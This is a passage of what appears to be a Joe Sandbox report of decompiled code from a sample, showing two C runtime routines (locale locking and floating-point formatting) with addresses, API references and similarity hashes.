            • Opcode Fuzzy Hash: 8f846508ade2cf414f3cf3a194b0381ddbad9ead8115f0819d187d08aa691daa
            • Instruction Fuzzy Hash: B811AB318F96965BDB213F77FC456693FE46F10360BA04535F948DA1D0DB708870CA91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E002E8BC0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
            				void* _t4;
            				void* _t15;
            				void* _t17;
            
            				_push(8);
            				_push(0x2f24b0);
            				_t4 = E002E2400(__ebx, __edi, __esi);
            				_t17 =  *0x2f3d3c - 0x2f3d40; // 0x2f3d40
            				if(_t17 != 0) {
            					E002E442F(0xc);
            					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
            					 *0x2f3d3c = E002E73D6("@=/", 0x2f3d40);
            					 *(_t15 - 4) = 0xfffffffe;
            					_t4 = E002E8C09();
            				}
            				return E002E2445(_t4);
            			}






            0x002e8bc0
            0x002e8bc2
            0x002e8bc7
            0x002e8bd1
            0x002e8bd7
            0x002e8bdb
            0x002e8be1
            0x002e8bf2
            0x002e8bf7
            0x002e8bfe
            0x002e8bfe
            0x002e8c08

            APIs
            • __lock.LIBCMT ref: 002E8BDB
              • Part of subcall function 002E442F: __mtinitlocknum.LIBCMT ref: 002E4441
              • Part of subcall function 002E442F: EnterCriticalSection.KERNEL32(00000000,?,002E37AB,0000000D), ref: 002E445A
            • __updatetlocinfoEx_nolock.LIBCMT ref: 002E8BEB
              • Part of subcall function 002E73D6: ___addlocaleref.LIBCMT ref: 002E73F2
              • Part of subcall function 002E73D6: ___removelocaleref.LIBCMT ref: 002E73FD
              • Part of subcall function 002E73D6: ___freetlocinfo.LIBCMT ref: 002E7411
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
            • String ID: @=/$@=/
            • API String ID: 547918592-3168913135
            • Opcode ID: fbca8b347c81b6d86aca1c6fa6d37dc7ed6f93ef9f30a0b1cf3b1fabfd045f95
            • Instruction ID: e8ab3e73d545a7af9ecb7cee6a16716507f5769d25928c0ecfd5639ab5a2703e
            • Opcode Fuzzy Hash: fbca8b347c81b6d86aca1c6fa6d37dc7ed6f93ef9f30a0b1cf3b1fabfd045f95
            • Instruction Fuzzy Hash: 1EE0CD315F1384D5D614FB727807B5CB2609B027F1FF06167F148561D1CEF44A648E26
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E002EA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
            				intOrPtr _t25;
            				void* _t26;
            
            				_t25 = _a16;
            				if(_t25 == 0x65 || _t25 == 0x45) {
            					_t26 = E002EAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
            					goto L9;
            				} else {
            					_t34 = _t25 - 0x66;
            					if(_t25 != 0x66) {
            						__eflags = _t25 - 0x61;
            						if(_t25 == 0x61) {
            							L7:
            							_t26 = E002EA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
            						} else {
            							__eflags = _t25 - 0x41;
            							if(__eflags == 0) {
            								goto L7;
            							} else {
            								_t26 = E002EB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
            							}
            						}
            						L9:
            						return _t26;
            					} else {
            						return E002EB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
            					}
            				}
            			}





            0x002ea950
            0x002ea956
            0x002ea9c9
            0x00000000
            0x002ea95d
            0x002ea95d
            0x002ea960
            0x002ea97b
            0x002ea97e
            0x002ea99e
            0x002ea9b0
            0x002ea980
            0x002ea980
            0x002ea983
            0x00000000
            0x002ea985
            0x002ea997
            0x002ea997
            0x002ea983
            0x002ea9ce
            0x002ea9d2
            0x002ea962
            0x002ea97a
            0x002ea97a
            0x002ea960

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
            • Instruction ID: 98c1d814dc1bc2c5b5dd0064382151b4008e75188156968a128734ce436507f3
            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
            • Instruction Fuzzy Hash: F301403249018EFBCF125F95CC518EE3F22BB18354F998515FE1958032D336E9B1AB92
            Uniqueness

            Uniqueness Score: -1.00%